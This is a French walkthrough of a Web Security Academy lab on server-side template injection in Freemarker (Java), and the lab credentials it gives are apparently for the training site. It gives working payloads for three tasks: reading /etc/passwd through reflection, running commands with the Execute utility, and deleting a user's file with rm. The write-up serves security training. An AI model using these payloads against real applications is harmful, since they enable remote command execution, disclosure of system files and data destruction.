SSTI utilisant la documentation du moteur (Java)

Server-side template injection using documentation

Lab: Server-side template injection using documentation | Web Security AcademyWebSecAcademy

Ce laboratoire présente une vulnérabilité SSTI. L’objectif est d’identifier le moteur de template utilisé, de consulter sa documentation pour comprendre comment exécuter du code arbitraire, puis de supprimer le fichier morale.txt dans le répertoire de Carlos. Les identifiants fournis sont : content-manager : C0nt3ntM4n4g3r.

Analyse du template

Dans les commentaires, une expression est rendue par le moteur :

Test simple :

${7*7}

Une erreur révèle que le moteur employé est Freemarker (Java).
Une nouvelle expression comme ${7*a} confirme l’interprétation du template.

${7*a}

Lecture de fichiers

Pour lire le fichier /etc/passwd, on utilise les méthodes accessibles via l’objet :

${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}

Exécution de commandes

Freemarker permet d’invoquer l’utilitaire Execute :

${"freemarker.template.utility.Execute"?new()("id")}

Suppression du fichier cible

Pour supprimer morale.txt dans le répertoire de Carlos :

${"freemarker.template.utility.Execute"?new()("rm /home/carlos/morale.txt")}

Mis à jour il y a 2 mois

hashtagServer-side template injection using documentation

hashtagAnalyse du template

hashtagLecture de fichiers

hashtagExécution de commandes

hashtagSuppression du fichier cible

Server-side template injection using documentation

Analyse du template

Lecture de fichiers

Exécution de commandes

Suppression du fichier cible